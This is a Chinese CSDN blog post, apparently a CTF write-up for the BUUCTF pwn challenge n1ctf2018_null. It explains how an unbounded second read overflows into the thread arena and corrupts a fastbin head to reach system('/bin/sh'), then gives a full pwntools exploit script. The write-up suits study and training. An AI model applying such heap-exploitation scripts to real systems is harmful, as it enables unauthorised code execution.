【BUU】n1ctf2018_null

最新推荐文章于 2024-05-30 09:37:46 发布
最新推荐文章于 2024-05-30 09:37:46 发布
阅读量517 收藏
点赞数 1
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43960998/article/details/115641480
版权
本文详细描述了一种利用程序中漏洞,通过多次malloc操作导致内存溢出,进而覆盖线程arena并篡改fastbin链表,最终实现对堆栈的接管和执行shellcode的过程。涉及了内存管理、堆栈布局和漏洞利用技术。
摘要由CSDN通过智能技术生成
1.漏洞利用

    主函数启动了一个线程,然后进入 routine,是一个循环:
在这里插入图片描述
    根据大小和个数一直 malloc,提供输入数据的功能:
在这里插入图片描述
    问题就出在这个读入函数,for 循环过后,还是继续读入 a2 字节也就是传进来的 size,那这就可以第一次输入 x (< size) 个数据,第二次可以继续在 ptr + x 处读入 size 个字节,因为申请 chunk 的 size 和个数都比较多,如果能覆盖到线程 arena,那么就能将将 fake_chunk_ptr 链接到 fastbin 对应位置,进而分配过去,因为在线程 arena 的头部存在如下结构体:
在这里插入图片描述
mstate 结构体则是常见的:
在这里插入图片描述
其中存放了 fastbin 等链表头信息,如果能篡改这里为 fake_chunk_ptr,就会分配到这里。
在这里插入图片描述
就是这个位置。
但是还有个问题是 arena 是先 mmap 出来的,heap 是之后分配的,heap 的地址比 arena 的地址高,怎么能覆盖到呢?
当管理器检测到 top chunk 不够分配时,会调用 sysmalloc 来进行分配:在这里插入图片描述
sysmalloc 会先尝试去扩展堆,如果不能扩展,就重新 mmap 一块:
在这里插入图片描述
那如果我们将当前堆空间消耗没,然后 grow_heap 的下方是 libc 用到的地址,就会在 arena 前 mmap 一块,这样当我们再次消耗完 mmap 的这块堆,那么就可以覆盖到线程 arena,进而篡改 fastbin 链表头。
消耗完堆空间的效果:
在这里插入图片描述
此时新 mmap 的堆内容:
在这里插入图片描述
其 mstate 指针还是指向原来的 arena,然后消耗完这部分效果:
在这里插入图片描述
利用 read 的 size 没更新,可以溢出覆盖到 fastbin 到 :
在这里插入图片描述
ptr 指向处布置 “/bin/sh”,0x602038 处布置为 system,执行到此处 getshell。
具体申请 chunk 的数量就是先算个大概,然后试几次就能出来。

2.完整exp
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from ctypes import *
context.log_level = 'debug'

binary = './null'
elf = ELF('./null')
libc = elf.libc
# libc = ELF("./libc64.so")
# libc = ELF("/home/mtb0tx/share/ctf-pwn/libc/libc6_2.27-3ubuntu1_amd64.so")
# libc = cdll.LoadLibrary("./libc.so.6")
context.binary = binary

DEBUG = 1
if DEBUG:
	p = process(binary)
else:
	host = "node3.buuoj.cn"
	port =  26375
	p = remote(host,port)
if DEBUG == 2:
	host = ""
	port = 0
	user = ""
	passwd = ""
	p = ssh(host,port,user,passwd)

def dbg():
    gdb.attach(p)
    pause()

l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
se      = lambda data               :p.send(data) 
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
rc      = lambda num          		:p.recv(num)
rl      = lambda                    :p.recvline()
ru      = lambda delims             :p.recvuntil(delims)
info    = lambda tag, addr          :log.info(tag + " -> " + hex(addr))
ia		= lambda                    :p.interactive()

menu = "Action: "

def cmd(i):
	ru(menu)
	sl(str(i))

def add(size, cnt, content=''):
	cmd(1)
	sla("Size: ", str(size))
	sla("Pad blocks: ", str(cnt))
	if (content == ''):
		sla("Content? (0/1): ", "0")
	else:
		sla("Content? (0/1): ", "1")
		sa("Input: ", content)

system_plt = elf.plt['system']
sla("Enter secret password: ", "i'm ready for challenge")

for i in range(12):
	add(0x4000, 1000)

add(0x4000, 262, 'a'*0x3ff0)

payload = '1'*0x50 + p32(0) + p32(3) + 10*p64(0x60201d)
sleep(0.2)
se(payload)

sleep(0.2)
payload = '/bin/sh'.ljust(0xB,'\x00') + p64(system_plt)
payload = payload.ljust(0x60,'b')
add(0x60,0,payload)

# dbg()

ia()

参考

、皮皮鸭
关注
专栏目录
BUUCT-PWN 0ctf_2018_heapstorm2(house of storm)
weixin_44145820的博客
04-25 1670
目录题目分析漏洞利用Exp 题目分析 这题估计是house of storm利用的起源? 因为用这种办法直接就可以做通,后面还有rctf_2019_babyheap也需要用到house of storm,但是那题限制条件多多了 init()里先把fastbin禁用了 申请了0x13370000这块内存,并且做了初始化 初始化首先读入长度为0x18的随机数,就记为3个long long随机数吧...
Buu CTF PWN ciscn_2019_c_1 WriteUp
m0sway的博客
03-03 566
Buu CTF PWN题ciscn_2019_c_1的WriteUp
n1ctf2018_null(通过劫持线程arena达到任意地址分配)
seaaseesa的博客
07-26 2488
n1ctf2018_null(通过劫持线程arena达到任意地址分配) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,主函数启动了一个线程 在线程里,是一个循环 其中输入函数存在溢出,由于a2没有更新,因此,如果将数据分成2部分读入的话,第二次,仍然可以读入a2个数据,从而溢出。 溢出尺寸比较大,如果能够覆盖到线程arena,那么就能将fake_chunk链接到fastbin,进而分配过去。但是arena是先mmap出来的,heap是过后才分配出来,因此,线程heap的
php ctf题解,国际赛-N1CTF 2018-Web题解
weixin_34471172的博客
03-11 980
前记N1CTF2018是由国内知名战队Nu1L战队组织,由南京赛宁提供技术支持。正好假期空余,于是便来试了试,总的来说,题目难度较高,但是由于存在非预期,所以降低了一些困难性。77777拿到题目注意几个信息点:容易发现我们需要的就是admin的password字段所以容易构造payload:flag=1111&hi= where (password like 0x25)即Update u...
从入门到放弃系列之 N1CTF2018 pwn vote writeup
zhangji
03-12 690
N1CTF2018 pwn vote writeup 检查程序的安全防护情况 [*] '/home/zhangji16/c_study/vuln/n1ctf2018/pwn/vote/vote_patch Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled ...
探索网络安全的宝藏 —— n1ctf-2018
最新发布
gitblog_00047的博客
05-30 274
探索网络安全的宝藏 —— n1ctf-2018 n1ctf-2018Official repository containing files related to N1CTF 2018.项目地址:https://gitcode.com/gh_mirrors/n1/n1ctf-2018 项目介绍 在技术日新月异的今天,网络安全成为了我们不可忽视的重要领域。n1ctf-2018 是一个专门为安全爱好...
N1CTF-WRITE-UP
郁离歌丶的博客
03-13 2466
N1CTF-WRITE-UP写在前面:萌新第一次打国际赛(莫名紧张)没做出几题,国际赛就是国际赛,环境也十分接近实战,赛完也放出了源码和wp,十分良心的主办方,为Nu1L打call打call。(然而我并不会做几个题233333继续努力吧,还差得很远很远...)2333333等我写wp的时候环境已经挂了,没办法懒是致命伤。所以下面用记忆和盗图做题23333333WEB77777进去就看到了信息目标是...
buu-[CFI-CTF 2018]IntroToPE
qaq517384的博客
04-10 387
解压为一个NET文件 程序为一个检验密码的程序 dnSpy打开,根据按钮搜索相关函数 过一遍发现 Q0ZJey5OZXRDI18xc19AdzNzMG0zfQ== base64解密即可 flag{.NetC#_1s_@w3s0m3}
BUUCTF-babyheap_0ctf_2017
Rt1Text的博客
11-27 573
标准堆菜单。
apachecn#apachecn-ctf-wiki#[WPBUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
python(N1CTF)详解
crispr的博客
07-07 2569
python(N1CTF)详解 前言 本来想晚上记录的,但是一看明天高考,想早点起来记录,结果睡到九点多。。。赶紧爬起来记录下这题,这题综合考察了一些,说难最后写exp基本上没改,说不难你得把python全看一遍,加密方式也要了解才能解出来。下面来看看这个题。 正文 题目给了两个python文件,一个是加密的,一个是加密后base64给的密文,这里贴一下: #challenge.py from N1ES import N1ES import base64 key = "wxy191iss0000000000
crypto密码学知识大纲
khy123khy的博客
07-17 1733
文章目录概述基本分类古典密码凯撒密码移位密码atbash cipher(埃特巴什)简单替换密码仿射密码多表替换加密维基利亚密码hill密码培根密码栅栏密码01248 云影密码键盘密码对称密码流密码块密码非对称密码RSA哈希函数MD5SHA1 概述 ctf-wiki https://ctf-wiki.github.io/ctf-wiki/crypto/introduction/ 基本分类 古典密码 识别密码类型 加密方式,字符类型 ##单表替换加密 特点:明文密文一一对应 破解:密钥空间小,暴力破解(
guess-num的wp
WangLal的博客
03-06 203
攻防世界PWN guess nun的wp 基本三步 checksec,file,执行文件 发现是个64位文件,且只有RELRO没开( 出现Permission denied报错时,用chmod去修改文件权限,就可以了 放进IDA中,在各函数中寻找 在函数sub_C3E中找到了 再进入main函数中怎样获得flag,上网找了一下srand和rand的含义 srand函数是随机数发生器的初始化函数。 srand和rand()配合使用产生伪随机数序列。 所以要通过给srand设置为0或1, 来保证生成的随机数
SWPUCTF 2022 Darling wp
m0_64111146的博客
12-19 165
SWPUCTF 2022 Darling wp
引用动态库
weixin_30480651的博客
08-02 110
1、引用so库: from ctypes import * >>>CDLL("libc.so.6").printf("12345\n")12345 >>>cdll.LoadLibrary("libc.so.6").printf("12345\n") 12345 2、引用DLL库: 2.1、python2.7.13下的验证 >>>c...
XCTF pwn例题思路整理 侵删
londonyan的博客
11-15 3907
XCTF pwn例题思路整理 侵删 1 .decode("iso-8859-1")处理报错 2 read() 栈溢出 函数定义:ssize_t read(int fd, void * buf, size_t count); 函数说明:read()会把参数fd所指的文件传送count 个字节到buf 指针所指的内存中。 返回值:返回值为实际读取到的字节数, 如果返回0, 表示已到达文...
Buuoj sctf_2019_easy_heap
u014377094的博客
03-12 656
大佬博客传送门:sctf_2019_easy_heap - LynneHuan - 博客园 (cnblogs.com) 知识更新: 1.你需要了解一下off-by-one,unlink,overlapping是啥 传送门在这里:堆中的 Off-By-One - CTF Wiki (ctf-wiki.org) 2.了解一下chunk 空间的共用情况,也就是下一个的 chunk 的 prev_size 域给当前 chunk 当做数据域使用,这 种情况只出现在 malloc 的大小为 8 的奇数倍(32
Bugku 密码学AK指南
Prowes5的博客
12-21 2730
#bugku 密码学 AK指南 平台网址 bugku新上了几个密码学,更新一波,顺便整理一下CSDN和github的博客。 1.滴答~滴 -... -.- -.-. - ..-. -- .. ... -.-. 很明显是摩斯密码,直接摩斯解密加上flag格式就好。 KEY{BKCTFMISC} 2.聪明的小羊 根据题目提示,很明显是栅栏加密,直接栅栏解密就可以了。 KEY{sad23j...
python(N1CTF) 100详解
gbxiaowang的博客
05-03 2114
N1es.py challenge.py 题中有两个文件,一个是封装好的N1ES.py,另一个是challenge.py,通过调用n1se实现加密操作。 逐步分析其加密生成方式: 1.首先给出了key key=“wxy191iss00000000000cute” 先调用的是string_to_bits函数 o = string_to_bits(self.key) def string_to...
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值